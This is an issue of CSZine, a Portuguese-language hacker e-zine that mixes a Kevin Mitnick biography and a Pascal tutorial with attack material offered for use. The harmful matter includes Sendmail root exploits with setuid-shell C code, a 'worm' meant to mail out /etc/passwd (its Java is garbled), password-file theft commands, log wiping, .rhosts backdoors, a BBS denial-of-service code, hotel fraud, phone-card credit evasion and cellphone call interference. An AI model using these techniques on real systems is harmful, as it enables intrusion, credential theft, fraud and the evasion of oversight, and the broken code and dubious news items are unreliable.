zZZZZZZZZZZZZZZZz zZ cCCCCCCCCc sSSSSSSSSs zZ cCCCCCCCCCCCCc sSSSSSSSSSSSSs zZ cCCC CCCCc sSSS SSSSs zZ cCCCc SSSSs zZ II NNn NN EEEEE CCCCC SSSSSSSSSSs zZ II NNNn NN EE CCCCC SSSSSSSSSs zZ II NN NnNN EEEE CCCCC SSSSS zZ II NN NNN EE CCCC CCCCc sSSSS SSSS zZ II NN NN EEEEE CCCCCCCCCCCCCC SSSSSSSSSSSSSS zZ CCCCCCCCCC SSSSSSSSSS zZ zZ zZ zZZZZZZZZZZZZZZZZz PS: Se você não conseguiu lêr direito, aí em cima tah escrito CSZine. UIN da revista : 16623675 Canal da revista : #CSCHANNEL no irc.via-rs.com.br E-Mail da revista : cszine@hotmail.com Novo E-mail da revista : cszine@xoommail.com Nova home page da revista : http://members.xoom.com/cszine =-=-=-=-=-=-=-=-=-=-=-=-=-=-=Cheat=Struck-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Introdução: Saiu!!! Saui!!! Saiu a nova homepage da CSZine!!!! Agora você não tem do que reclamar. Toda a semana(se der) estará uma novissima CSZ esperando por você na novissima Cheat Struck's HomePage. Você notará de cara que a page não está cheia de babaquices e sim + textos e links. Isso porque eu não quero ninguem reclamando de que tá muito demorado carega-la. Um conselho: Não tente abri-la no sabado a noite porque tem muito trafigo na xoom(server que hospeda a page). Lá vc encontrará tb links para algumas pages voltadas ao assunto hack e programas, textos, zines. Também está la' o Book Hacker escrito por mim que é um resumo das melhores matérias das 10 primeiras edições da zine e também com umas matérias a mais, indispensaveis. Eu aconcelho você a ir lah agorinha mesmo e baixar tudo o que tem lah agora, pois a page está em constante atualização e não garanto que todas as zines e textos que tem lá hoje, estarão lá amanhã. Quanto essa edição como sempre tá d+. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-= Indice: Seção: Materia: Assunto: Autor: Nota: 1. Kevin Mitnick "O chacal da rede" AliBaBa 10,0 2. Vivendo Sobreviva Cheat Struck 9,5 3. Phreaking Tel. Celular e a Cartão Cheat Struck 10,0 4. Programação Tutorial de pascal Cheat Struck 10,0 5. Bugz Mais alguns bugz Cheat Struck 10,0 6. VIRII Worms Cheat Struck 9,0 7. News Noticias quentes Cheat Struck 8,5 8. Hack p/ iniciantes Dicas basicas Cheat Struck 10,0 9. Crackerz Lista de Hexas Cheat Struck 9,5 10. Hack, the Art Hacker test Cheat Struck 9,0 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 1. Kevin Mitnick $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- A história do Chacal da rede. (Parte 1) -=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-= Como Hacker, a carreira de Mitnick teve inicio em 1980 quando apenas com 16 anos e, obsecado pelas redes de computadores, rompieu a segurança do sistema administrativo de seu colegio, mas não para alterar suas notas, "só para dar uma olhada". Sua estréia como infrator da lei foi em 1981. Junto a dois amigos, entrou fisicamente nas oficinas COSMOS de Pacific Bell. COSMOS (Computer System for Mainframe Operations) era uma base de dados utilizada pela maior parte das companias telefonicas norteamericanas para controlar o registro de chamadas. Uma vez dentro das oficinas obtiveram a lista de chaves da segurança, a combinação das puertas de acesso de varias filiais e manuais do sistema COSMOS. A informação roubada teria um valor equivalente a 200 mil dólares. Foram delatados por um dos amigos e devido a sua minoria de idade uma Corte Juvenil o sentenciou a 3 meses de prisão e 1 ano de libertade con- dicional. Após cumprir o periodo de tres meses, o oficial custodio encaregado de seu caso encontrou seu telefone desconectado e que a compania telefonica não tinha nenhum registro dele. Seus objetivos ian crescendo a cada passo e em 1982, entrou ilegal- mente, via modem, no computador da North American Air Defense Command no Colorado. Antes de entrar, alterou o programa encaregado de rastrear a origem das chamadas e desviou o rastro de sua chamada a outro lugar. O FBI, crendo que havia rastreado Mitnick, alarmou a casa de uns imigrantes que estavan vendo televisão. Um ano mais tarde foi preso de novo quando era estudante da Universi- dade do Sul da California. Nesta ocasião, entrou ilegalmente na ARPAnet (a rovedora de Internet) e tratou de acessar o computador do Pentagono. O sen- tenciaram a 6 meses de prisão em uma prisão juvenil na California. Em 1987, queria tratar de por sua vida em ordem, caiu na tentação e foi acusado, em Santa Cruz California, de invadir o sistema da compania Microcorp Systems. O sentenciaram a 3 anos de libertade condicional e logo após cumprir a pena, desapareceu dos computadores e da policia local. Procurou trabalho no que melhor sabia fazer e solicitou emprego no Security Pacific Bank como encaregado da segurança da rede do banco. O banco não ligou para seus antecedentes criminais e Mitnick falsificou um balanço geral do faturamento do banco que indicava perda de 400 milhões de dolares e enviou-o para a rede. Nesse mesmo ano, iniciou o escandalo que o lançou para a fama. Duran- te meses observou secretamente o correio eletronico dos membros do departa- mento de segurança da MCI Communications e Digital Equipment Corporation para conhecer como estavan protegidos seus computadores e o sistema telefonico de ambas companias. Logo depois de recolher suficiente informação se apoderou de 16 códi- gos de segurança da MCI e junto a um amigo, Lenny DiCicco, entraram na rede do laboratorio de investigações da Digital Corporation, conhecida como Easynet. Ambos Hackers querian obter uma copia do prototipo do novo sistema operacional de segurança da Digital chamado VMS. O pessoal da segurança da Digital se deu conta imediatamente do ataque e deram o aviso ao FBI, e come- çaram a rastrear os hackers. Mitnick foi um mau cumplice e, apesar de que havian trabalhado juntos , colocou toda a culpa a DiCicco fazendo chamadas anonimas ao chefe dele que trabalhava em uma compania de software como técnico de suporte. Cheio de raia e frustração DiCicco confesou todo a seu chefe que os denunciou a Digital e ao FBI. Mitnick foi preso em 1988 por invadir o sistema da Digital Equipment. A empresa acusou a Mitnick e a DiCicco diante a um juiz federal de causar danos de 4 milhões de dólares no roubo de seu sistema operacional. Foi decla- rado culpado de um cargo de fraude em computadores e de posse ilegal de codigos de acesso de longa distancia. Junto a sentença o fiscal obteve uma orden da corte que proibia Mitnick o uso do telefone na prisão, alegando que o prisioneiro poderia obter acesso a computadores através de qualquer telefone. O pedido de Mitnick o juiz o autorizou a chamar Unicamente seu advogado, a sua esposa, a sua mãe e a sua avó e sómente com a supervisão de um oficial da prisão. Este caso movimentou os Estados Unidos, não só pelo fato ocorrido e sim pela tatica que utilizou a defensa. Seu advogado convenceu o juiz que Mitnick sofria de um vicio por computadores assim como um drogado, un alcóli- co ou um apostador. Graças a esta manobra da defensa, Mitnick foi sentenciado a sómente um ano de prisão e ao sair devia frequentar um programa de 6 meses para tratar seu "vicio por computadores". Durante seu tratamento lhe foi pro- ibido tocar em um computador ou um modem. -=-=-=-=-=-==-=-=-==-=-=-=-=-==-=-=-=-=-=-=-=-=-==-=-==-=-=-=-=-=-==-=-==-=-= Fim da parte 1 -=-=-=-=-=-=-=-=-=--=-=-=-==-=-=-==-=-=-=-=-=-=-=-=-==-==-=-=-=-=-=-=-=-=-=-= $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 2. Vivendo $$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-==-=-=-=-= Trancando Escadas rolantes -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Não sei se funciona em todas as escadas rolantes de todos os xoopins. Sei que funciona na nova area do Iguatemi. Faça o seguinte: Repare que embaixo dos corrimoes das escadas rolantes, no inicio e no fim delas(acho que na direita) tem um botão vermelho escrito PARE. Plim! Capitou vossa mensagem? -=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Todos os canais da tv a cabo no seu hotel -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Esse truque foi retirado da zine Axur05. Só funcionará se seu hotel tiver um fregobar com um sistema de cabo RJ45 e uma Tv a cabo com o mesmo es- quema. Aí é só tirar o cabo da tv à cabo e troca-lo pelo do frigobar. O cabo RJ45 é usado nos States e é o mesmo tipo do modem. Você receberá todos os canais pagos sem ter nenhum extra. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Hotel de Graça -=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=--=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=- Para deixar a dica anterior completa. Faça o seguinte: Ligue pra o hotel avisando que você esteve recentemente hospedado e que seu nome é PAULO (Escolha um nome bem COMUM). O atendente deve confirmar com algum sobrenome e você diz que é aquele mesmo. Peça pra ele fazer uma reserva pra tantos dias. Quando ele pedir a forma de pagamento, atenção: DINHEIRO, pelo cartão eles podem te localizar. Pronto, é só chegar no hotel e dormir. Esse foi um dos truques que Kevin Mitnick usou quando estava fugindo do FBI e é descrita no livro "O JOGO DO FUGITIVO". $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 3. Phreaking $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-= Atrapalhando conversas de Celulares. -=-=-=-=-=-=-=-=-=--==-=-=-=-=-=--=-=-==-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-= Se você entrou em um canal onde dois palhaços estão falando muita besteira e vc quer mandar ambos calarem a boca, use o comando 10# para ligar o trasferidor de audio e 09# para desligar depois. Aí fale a besteira que quizer que eles irão te ouvir no mesmo volume que você estiver ouvindo eles. Se você está os ouvindo muito baixo use o comando 476# para dixar o volume no máximo. Para deixar bem baixinho use 471#. E para deixar no nível padrão use 474# Agora um tróço muito maneiro de se fazer é comprimir e expandir o Audio. Sabe aquelas mensagens anonimas com a vóz destorcida?? É, tem como fazer isso com um simples celular. Digite o comando 58# para ligar e 59# para desligar. Isso é um dos tróço mais tri de se faze. Se você quizer ligar para alguem com esse audio digite: 58#01# Re-ligue o telefone e disque normalmente. Agora todos os que estiverem do outro lado da linha ouvirão a sua vóz destorcida. Se quizer desligar depois(provavelmente vc vai querer) volte para o TEST MODE e digite: 59#01# Prontinho, pode voltar a liguar como se nada tivesse acontecido. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Estudando os cartões telefonicos: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Você já esperimentou raspar a parte de traz(cinza) de um cartão tele- fonico, só para ver como funciona?? Bem experimente e veja a estrutura do cartão. Legal não? São 4 coluninhas com uns baguio que nenhuma conta no mundo (eu acho?) igualaria-os ao numero de créditos total do cartão. É um tróço tipo esse: ___________________________________________________ | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | | | o-|-o | o-|-o | o-|-o | o-|-o | | ----------------------------------------------------- ¡Atenção! Desenho retirado da zine Hack and Phreak! Bem isso não nos diz nada. A unica coisa que eu consegui descobri é que ao enfiar o cartão assim: _______________ | Orelhão | | | | ____ [1][2][3]| || |[4][5][6]| | ---- [7][8][9]| | [*][0][#]| | | _______ | [ | <-- | ||||| | | [ | <-- | ||||| | cartão --------------- ------- Ele mandará os pulsos para queimar os créditos nessa sequencia: _______________ | |*| | | | | | |*| | | | | | |*| | | | | | |*| | | | | --------------- | | | | | | | +--->E finalmente essa. | | | | | +--->Depois essa. | | | +--->Depois nessa. | +--->Primeiro nessa coluna. Então talvéz se você fizer algo certo uma vez na vida a dica fncione. Ao invés de riscar com um lapis 6b em todo o cartão, dos 2 lados. Risque apenas na parte indicada: _______________ |###| | | | | | |###| | | | | | |###| | | | | | |###| | | | | | --------------- | +---> Aki o leigo! Isso desviará o pulso que seria dado na primeira coluna para um pouco mais pro lado, onde é só plastico. E isso evitará que você perca créditos. Porém se você me ter o cartão assim: _______________ /|__ | | | | | |###| < __ | | | | | |###| \| | | | | | |###| | | | | | |###| --------------- Aí eu ja não garanto nada. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 4. Programação $$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-==- Tutorial de Pascal (parte 2) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= »»»»»»»»»» A declaração do Type «««««««««« A area de declaração type serve para indicar novas variaveis. Essas variaveis podem servir para definir outras. Ex: Type Dia_util = (segunda, terça, quarta, quinta, sexta); Var Dia_da-semana : Dia_util; »»»»»»»»»» Constantes «««««««««« Na area Const podemos definir quantas constantes quizermos. Ex: Const My_first_Name = 'Cheat'; My_secound_Name = 'Struck'; My_ID = '0'; Algumas constantes pré-definidas que poderão ser muito uteis são: True { verdadeiro } False { Falso } Nil { nulo } As constantes também podem ser definidas assim: Const My_Nick : STRING[6] = Struck; »»»»»»»»»» Operadores aritimeticos «««««««««« + { Adição } - { Subtração } * { Multiplicação } / { Divisão com numeros reais } DIV { idem com numeros inteiros } MOD { Mostra o resto da divisão } »»»»»»»»»» Operadores Lógicos «««««««««« AND { igual a true quando todos os operadores forem true } OR { igual a true quando pelo menos 1 operador for true } XOR { igual a true quando os operadores forem diferentes } Esses operadores só aceitam valores true e false. »»»»»»»»»» Operadores relacionais ««««««««««« = { igual } <> { diferente } > { maior que } < { menor que } >= { maior ou igual que } <= { menor ou igual que } IN { testa se um elemento esta incluido em um conjunto } »»»»»»»»»» Procedures ««««««««««« Write e Writeln. Ambas são responsaveis por mostrar dados na tela. O Write deixa o cursor ao lado do que foi escrito enquanto o Writeln pula a linha. Exemplos: Write('Baboseira'); { Mostraria a palavra Baboseira } Write('Baboseira':4); { Mostraria assim ....Baboseira } { Os pontos representam espaços em branco } Write('1.2345':4:2); { Mostraria assim ....1.23 } | +--- { Casas depois da virgula } Writeln(lst,'Isto será imprimido') { Imprime texto } Read e Readln. Responsaveis de ler dados via teclado. O Read lê os dados enviados pelo teclado até q pressione Enter. Aí o cursor continua na linha. Enquanto o Readln é a mesma coisa só que o cursor vai para uma linha abaixo. Exemplos: Readln(kbd,a) { Grava os dados enviados do teclado em "a" sem mostra-los na tela } ClrScr. Apaga a tela. Gotoxy Move o cursor para o local indicado. Exemplo: Gotoxy(1,1) { Move o cursor para o inicio da tela } ClrEol Apaga a linha desde posição atual do cursor. CrtExit Mostra a String de finalização. CrtInit Mostra a String de inicialização. Delline Deleta a linha do cursor. InsLine Insere uma linha na posição do cursor. HighVideo ou NormVideo Coloca o video no modo normal. LowVideo Coloca o video em baixa intenciadade. TextBackGround Indica a cor de fundo na qual o texto será escrito. Ex: TextBackGround(0) { fundo preto } TextBackGround(1) { fundo azul } TextBackGround(2) { fundo verde } TextBackGround(3) { fundo ciano } TextBackGround(4) { fundo vermelho } TextBackGround(5) { fundo magenta } TextBackGround(6) { fundo cinza } TextColor Indica a cor do texto a ser inserida. A sintaxe é a mesma do TextBack Ground. Aki está a tabela de cores: 0 Preto 1 Azul 2 Verde 3 Ciano 4 Vermelho 5 Magenta 6 Marrom 7 Cinza-claro 8 Cinza-escuro 9 Azul-claro 10 Verde-claro 11 Ciano-claro 12 Vermelho-claro 13 Magenta-claro 14 Amarelo 15 Branco 16 Piscante Window Abre uma janela de texto. A sintaxe é : Window(x1,y1,x2,y2); onde o x1,y2 é o canto direito superior e x2,y2 o esquerdo inferior. »»»»»»»»»» Functions «««««««««« WhereX Indica a coluna do cursor. WhereY Indica a linha do cursor. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-==- Fim da parte 2. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 5. Bugz $$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Bug para PCBoard Um bug bastante conhecido nas bbs que usam pcboard é o uso do @code. Para verificar se a bbs que vc acessa aceita @code vá ao chat ou veja a liner e tecle @ , se aparecer o @ é porque ele aceita. Agora use um dos seguintes comados: * Para travar o bbs por *** tempo: @DELAY:***@ Exemplo: @DELAY:999999999999999@ travará a bbs por um bom tempo. Outro bug maneirissimo jah foi visto em algumas zines. Você só preci- sa utilizar o protocolo bimodem e então poderá fazer o upload de qquer file da bbs. Po'rem a sua bbs tem que suportar o protocolo bimodem(Claro!). -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Bug do sendmail 8.8.4. Primeiro encontre o arquivo /var/tmp/dead.letter . Esse arquivo é fundamental. Aí linke o /etc/passwd para ele. Assim: $ ln /etc/passwd /var/tmp/dead.letter Agora de um telnet pela porta do smtp(25). Envie um e-mail de um user inesistente para outro user q não existe e coloque como conteudo: struck::0:0:Cheat Struck:/:/bin/sh Claro, mude de acordo com vc. Essa linha será incluida no /etc/passwd aí é só logar um telnet com o login que você colocou(no caso struck)e pronto, agora você é o root. A primeira coisa a fazer é uma backdoor. Pode ser a mais simples jah vista nas edições anteriores. Depois edite o /etc/passwd e retire o login que foi adicionado. E por fim, deslinke o /etc/passwd do /var/tmp/dead.letter. Use comando é unlink ou rm. Ah não se esqueça de apagar o arquivo de log do telnet e smtp. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-==-=-=-=-=-=-=-=-=-=- Bug do sendmail 8.73 e 8.83 Primeiro compile no host que vc irá hackear,estes dois programas com: cc -o leshka leshka.c cc -o /tmp/smtpd smtpd.c ------------------------------Corte-Aki-(smtpd.c)---------------------------- main() { setuid(0); setgid(0); system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); } ----------------------------------------------------------------------------- -------------------------------Corte-Aki-(leshka.c)-------------------------- main() { execl("/usr/sbin/sendmail","/tmp/smtpd",0); } ----------------------------------------------------------------------------- Agora rode o leshka. Depois digite: kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" Delete todos os arquivos do leshka e smtpd, inclusive a fonte com: rm leshka.c leshka smtpd.c /tmp/smtpd Agora execute o arquivo de shell /tmp/sh. Pronto você é o root. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 6. VIRII $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Worm Um worm é um programa que ao entrar em um sistema, executa comandos dando entrada para outros programas. Um exemplo de um worm bem legalzinho é o T25 criado por Draco. Ele entra pela porta de e-mail(smtp-25) e vasculha o sistema em busca do arquivo passwd. Depois o manda para você por e-mail. Compile-o com o cc. --------------------Corte-Aki------------------------------------------------ import java.net.*; import java.io.*; class trojan{ public static int portaServ = 25; public static int portCli = 25 = (Main = new Main ("Main", "SEUEMAIL"/") Main Connection = Main.openConnection (); public static DatagramSocket ds; public static byte buffer [] = new byte [tam_buffer]; public static void OClient () throws while (true){ int c = System.in.read(); switch (c) { case -1 public static void main (String args []) throws Exception { int d; Main = new Main("search"," /etc, passwd") MainConnection = Main.Connection (); } ds.send (new datagramPacket (buffer pos ,InetAddress.getlocalHost (), portaCli)); pos = 0 default: buffer [pos++] = (byte) c; } } } ----------------------------------------------------------------------------- A maioria dos worms leva um conteudo de virus e sendo assim tb se automultiplicam para infectar outros sistemas apartir do primeiro. Como esse worm não leva virus algum não a motivo de se multiplicar pela rede. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 7. News $$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ _.'^'._.'^'._.'^'._.'^._.'^'._ Vince Foster _.'^'._.'^'._.'^'._.'^._.'^'._ Um reporter da revista Forbes dos Estados Unidos assegura que um grupo de Hackers chamados "Quinta Coluna" descobriram a conta de Vince Foster que teria se assassinado pelos negócios obscuros de Clinton. O suicidio ocor- reu em 1995 e a revista Forbes não quiz publicar a história. _.'^'._.'^'._.'^'._.'^._.'^'._ O primeiro Worm _.'^'._.'^'._.'^'._.'^._.'^'._ Em 1988 o norteamericano Robert Noris criou o primeiro programa Worm. Esse worm se duplicava e infectava assim mais sistemas. Em menos de um ano este worm infectou mais de 6.000 sistemas de toda a internet. _.'^'._.'^'._.'^'._.'^._.'^'._ KGB hacked _.'^'._.'^'._.'^'._.'^._.'^'._ Em 1989 a justiça alemã deteve um grupo de crackers que haviam copia- do durante anos, milhares de programas de acesso ilegal e passwords do siste- ma de departamentos da KGB. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ $$$$$$$ $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$ $$$$$$ 8. Hacking p/ iniciantes $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$ $$$$$$$ $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Dicas basicas para hackear -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 1. Para roubar o arquivo de senhas. A) A mais basica e lamah do mundo. Use o comando: cat /etc/passwd B) Este comando pega o arquivo de senhas de provedores de acesso. Funciona quase sempre em AIX e Linux. Use um desses: * ypcat passwd * ypcat /etc/passwd * ypcat -x C) Este aki pegua as senhas, normalmente em HP-UX. pwget D) Este programa tira o shadow dos arquivos de senhas. Compileo com: cc -o unshad unshad.c -------------------Corte-Aki-(unshad.c)-------------------------------------- #include main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } ----------------------------------------------------------------------------- Rode-o assim: ./unshad >> passfile Onde passfile é o arquivo onde estarão os passwords. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= 2. Como não deixar rastros Preste atenção que isso é extremamente importante. A maioria dos hackers atualmente, entram no sistema e se emocionam tanto que até esquecem de apagar o arquivo de login. A) O primeiro arquivo de log que você encontrará é o .bash_history, isso se você estiver usando a shell bash. Antes de sair do sistema apague este file. B) Ao apagar este arquivo, ele irá criar o .bash_history~ indicando que o .bash_history foi alterado. C) Quando você mexer com o etc/passwd com o editor pico. Depois veja se não existe o arquivo etc/passwd~ ou etc/passwd-. Ele é um backup do passwd origi- nal. Apague-o. -=-=-=-=-=-==-=-=-=-=-==--==-=-=-==-=-=-=-=-=-=-=-==-=-=-=-==--=-=-=-=-=-=-=- 3. Como entrar no sistema. Na seção Invasão de privacidade sempre tem uma manha nova para inva- dir um sistema mas aqui vão umas manhas bem conhecidas. A) Primeiro você deve pesquisar um pouco sobre o provedor que quer hackear. Descubra um login dele e conecte-se. B) Ao conectar-se a inet com esse provedor, o seu login entra no hosts.allow dele. O hosts.allow é a lista de logins que o sistema aceita que se logem. C) Você está pronto para usar os serviços do provedor que vai hackear. D) De um rlogin assim: # rlogin -l username host.com.br Onde username é o login do kra e host.com.br o host do provedor. E) Digite a password e ao entrar de um ls -la. F) Veja se existe o arquivo .rhosts. Se existir edite-o e acressente a linha: + + G) Ou edite o file etc/hosts.equiv(crie-o se não existir) e lah coloque o algum login(que exista no sistema). F) Agora sempre que quizer entrar no sistema agora digite: # rlogin -l username host.om.br -=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=- 4. Para voltar lá outra hora. A) Deixe uma boa backdoor. Eu já ensinei a fazer backdoor's nas edições pas- sadas. Você tb pode encontra-las no Hacker Book. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 9. Crackerz $$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ 